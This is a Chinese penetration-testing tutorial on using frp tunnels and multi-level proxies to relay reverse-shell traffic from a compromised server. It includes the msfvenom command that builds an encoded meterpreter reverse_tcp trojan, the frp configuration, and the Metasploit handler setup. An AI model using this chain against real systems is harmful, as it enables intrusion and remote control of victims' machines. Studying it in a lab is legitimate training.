代理和多级代理

news2024/11/25 2:48:01

文章目录

  • 代理使用场景
  • 代理过程
  • 实验演示
  • 多级代理

代理使用场景

1、拿下远程 web 服务器

2、webshell 链接不稳定,需要使用稳定的木马程序

3、远程服务器无法直接链接攻击者电脑

4、需要借助公网vps转发来自失陷服务器的木马流量

5、借助frp服务端(vps)和客户端(内网攻击者)建立隧道

6、当vps某一个端口收到流量的时候,frps 会根据提前和 frpc约定好的规则,使用简历好的隧道转发流量

代理过程

VPS(Virtual Private Server):虚似专用服务器。它就相当于是一种技术,可以将一部服务器分割成多个虚似专享服务器,相当于一个具有公网地址的虚拟机。

监听:监听是一种叫隧道的服务。

frp:和nc差不多,能监听端口,也能实现隧道功能。

过程如下图,攻击机kali在内网,服务器在公网。内网的kali可以访问公网的服务器,但是服务器不能访问内网的kali,现在需要服务器主动连接内网的kali,就需要代理才能实现。

当攻击者拿下了服务器8.8.8.8的webshell权限,并上传了完整功能的木马,该木马的功能是让服务器去访问虚拟专用服务器vps的某一端口如4444,然后frps服务会将4444端口的流量转发到7000端口(vps由攻击者控制,监听7000端口),通过隧道发送给kali,从而建立连接。

7000端口是由frp进行监听的,frp分为服务端frps和客户端frpc。当frps运行时,会自动将7000端口开放(端口号可以在配置文件中更改),然后与客户端的kali的任一闲置端口进行连接,从而建立隧道。
在这里插入图片描述

实验演示

打开一台kali虚拟机和一台Win 10虚拟机,将Windows虚拟机调成桥接模式,kali虚拟机调成nat模式:
在这里插入图片描述

查询获得Windows和kali的ip分别是10.9.75.107和192.168.121.128,此时kali能访问Windows:
在这里插入图片描述

但是Windows不能访问kali:

在这里插入图片描述

使用msf命令生成一个针对Windows的木马文件:

-p:指定playload

-e:指定加密类型

-i:指定加密次数

-f:指定文件类型

-o:指定文件名

这里用的是真实机的IP,因为虚拟机的Windows需要真实机支持

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.9.75.241 LPORT=4444 -e
x86/shikata_ga_nai -f exe -o shell.exe -i 5

如下图,生成了一个木马文件:

在这里插入图片描述

然后将生成的木马文件放到Windows虚拟机上,模拟木马上传到服务器:
在这里插入图片描述

将frp_0.33.0_linux_amd64压缩包复制到kali上,用tar命令解压,并进入解压后的目录:

tar xf frp_0.33.0_linux_amd64.tar.gz

如下图:

在这里插入图片描述

使用命令编辑它的配置文件:

vim frpc.ini

然后修改配置文件,配置服务器ip(因为虚拟机的流量要经过真实机,所以需要填真实机IP),vps的端口,和监听的本地端口,配置后:wq保存退出:

配置成功后,当远程的vps收到来自4444端口的流量,然后通过7000端口转发,最终会被本地的1000端口接收

在这里插入图片描述

接下来用用kali的msf监听1000端口:

1、启动msf : msfconsole
2、载入监控模块use exploit/multi/handler
3、加载 payload:
set payload windows/meterpreter/reverse_tcp
set lport 1000
set lhost 127.0.0.1
run

如图,已开始监听127.0.0.1:1000:

在这里插入图片描述

由于虚拟机服务器的流量需要真实机的支持才能和kali通信,所以真实机上也需要启动frp服务:

frps.exe -c frps.ini

如图:

在这里插入图片描述

然后在kali中启动vps的frpc服务,调用之前配置好的frpc.ini文件:

sudo ./frpc -c frpc.ini

如图,启动成功:

在这里插入图片描述

运行Windows虚拟机中的shell.exe文件:

在这里插入图片描述

执行后回到kali的msf监听窗口,发现代理已经成功,获得了webshell,并且可以执行命令,如下图:

在这里插入图片描述

多级代理

在有些内网环境中,它的内网环境分为好几层,我们必须通过拿到一层内网中服务器的权限之后再通过这一内网中的服务器进一步访问二层内网中的其他服务器。在这种环境中,我们就需要多级代理突破层层内网,来实现在内网中漫游。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1090811.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

AI为锚,创新为帆,谱写数实融合发展新篇章

云聚园区,智享未来。9月27日,在苏州工业园区管理委员会、华为云计算技术有限公司的指导下,由SISPARK(苏州国际科技园)、华为(苏州)人工智能创新中心联合主办,东北大学工业智能与系统…

2.用Flask框架创建一个简单的Web程序

怎么安装Flask框架 在终端输入以下命令: pip install flask 验证flask安装: flask --version 编写app.py文件 app文件py如下: #导入flask框架中的两个模块 #Flask允许创建一个Flask应用实例,处理路由、请求和响应等功能 #render…

【交叉编译】tslib库交叉编译

tslib 是一个捕捉触屏事件的工具。qt 库在交叉编译的时候,提供了 -tslib 选项,使用该选项需要提前对 tslib 库进行交叉编译。 目录 1、源码下载 2、安装依赖 3、创建编译脚本 4、开始编译 1、源码下载 tslib 源码下载地址: https://github.com/lib…

oracle 与mysql兼容日期(格式:YYYY年MM月DD日)

日期类型:date 查询sql: select concat(concat(concat(to_char(END_DATE,YYYY),年),concat(to_char(END_DATE,MM),月)),concat(to_char(END_DATE,DD),日)) AS dateInfo from test显示结果:

python jieba 词性标注 中文词性分类 nlp jieba.posseg

参考:https://blog.csdn.net/yellow_python/article/details/83991967 from jieba.posseg import dt dt.word_tag_tab[好看] >>> vflag_en2cn { ‘a’: ‘形容词’, ‘ad’: ‘副形词’, ‘ag’: ‘形语素’, ‘an’: ‘名形词’, ‘b’: ‘区别词’, ‘…

2023年工业大麻行业研究报告

第一章 行业概况 1.1 定义 工业大麻行业是一个多面向且快速发展的领域,涵盖了从种植、加工到分销各个环节。与休闲大麻不同,工业大麻主要用于制造和商业用途。工业大麻的种植重点放在产生纤维、籽和生物质等有价值的产品上,而非产生高含量的…

Rt-Thread 移植3--临界段保护(KF32)

1.什么是临界段 执行下的时候不能被中断的代码段。 系统调度和外部中断都会打断,系统调度本质是产生PendSV中断。NMI FAULST和Hard FAULE除外2.代码实现 contex_gcc.c中添加 rt_base_t __attribute__((noinline)) rt_hw_interrupt_disable(void) {asm volatile(…

阿里云服务器内存型20个实例规格性能特点和适用场景汇总

阿里云服务器ECS内存型规格族属于独享型云服务器,在高负载不会出现计算资源争夺现象,因为每一个vCPU都对应一个Intel Xeon 处理器核心的超线程,内存型实例的云服务器其CPU处理器与内存配比通常为1:8,最高比约为1:20。本文介绍阿里…

Seata入门系列【6】分布式事务之TCC模式简介

1 历史背景 关于TCC的概念,最早是由Pat Helland于2007年发表的一篇名为《Life beyond Distributed Transactions:an Apostate’s Opinion》的论文提出。在该论文中,TCC还是以Tentative-Confirmation-Cancellation命名。正式以Try-Confirm-Cancel作为名称…

【运维笔记】swow源码编译安装

swow的github网址 https://github.com/swow/swow 从github中拉取源码 git pull https://github.com/swow/swow.git 编译安装 github中readme文件讲述了安装方法 这里整理了命令,进入拉取项目的目录后依次执行命令即可 #pwd 确保自己在swow目录中,如…

linux中搭建c语言环境并编译

安装gcc 安装 yum install gcc 检查 gcc --version 编译文件 1.编写test.c vim test.c #include <stdio.h>int main() {printf(" ***** \n");printf(" * o o * \n");printf("* ^ *\n");printf("* - *\n");printf…

VUE树结构实现

实现效果: 数据库表结构如下: 要求:需要有parentId,id。parentId就是父记录的id 表数据要求:一定不要让一条记录的parentid和id相同 前端代码: 注意:el-table标签里面需要加上属性,才可以有下拉箭头的样式 <el-table v-loading="listLoading" :data

· C语言在自动化如何控制系统

今日话题 C语言在自动化如何控制系统&#xff1f; 类&#xff1a;理解构造函数、属性、封装、继承、多态&#xff0c;有助于组织管理系统对象。 数据库&#xff1a;熟悉常见数据库&#xff08;如Access、SQL&#xff09;、SQL语言和操作&#xff0c;用于高效数据管理。 …

MySQL Row size too large (> 8126)

错误信息 ERROR 1118 (42000) at line 901: Row size too large (> 8126). Changing some columns to TEXT or BLOB or using ROW_FORMATDYNAMIC or ROW_FORMATCOMPRESSED may help. In current row format, BLOB prefix of 768 bytes is stored inline. 错误原因 这个问题…

Stewart六自由度正解、逆解计算-C#和Matlab程序

目录 一、Stewart并联六自由度正解计算 &#xff08;一&#xff09;概况 &#xff08;二&#xff09;Matlab正解计算 1、参考程序一 2、参考程序二 &#xff08;三&#xff09;C#程序正解计算 1、工程下载链接 2、正解运行计算 &#xff08;四&#xff09;正程…

zabbix监控——自定义监控内容

目录 自定义监控项步骤 案例 1、明确需要执行的命令 2、创建 zabbix 的监控项配置文件&#xff0c;用于自定义 key&#xff0c;并重启zabbix-agent2 3、.在服务端验证新建的监控项 4、在 Web 页面创建自定义监控项模板 1&#xff09;创建模板 2&#xff09;创建监控项 …

振弦传感器和无线振弦采集仪在隧道安全监测的解决方案

振弦传感器和无线振弦采集仪在隧道安全监测的解决方案 隧道作为交通工程的重要组成部分&#xff0c;具有极高的安全风险&#xff0c;因此隧道安全监测是必不可少的。振弦传感器和无线振弦采集仪作为隧道安全监测的两种重要设备&#xff0c;能够有效地监测隧道的振动情况&#…

探索JSON能力,看这一篇就够了

KING BASE JSON&#xff08;JavaScript Object Notation&#xff09;作为一种流行的数据格式&#xff0c;相比于TEXT和LOB类型&#xff0c;能更高效地实现数据的访问。此外&#xff0c;JSON能打通关系型和非关系型数据存储之间的界限&#xff0c;为业务提供更好的架构选择。 Ki…

POI、Easy Excel操作Excel

文章目录 1.常用的场景2.基本功能3.Excel在Java中是一个对象4. 简单的写&#xff08;07版本&#xff08;.xlsx&#xff09;Excel&#xff09;大文件写HSSF大文件写XSSF大文件写SXSSF 5. Excel读5.1 读取遇到类型转化问题该怎么解决5.2 遇到Excel公式怎么办 6. Easy Excel6.1简单…

[Python]黑色背景白色块滑动视频

黑色背景白色块滑动视频&#xff0c;单帧效果如下&#xff1a; 配置参数 1920 1080 400 400 300 60 1920x1080.avi import numpy as np import cv2 as cv import os import syswidth 1920 height 1080 rect_szx 400 rect_szy 300 sz_y_init 400 fps 24width int(sys.a…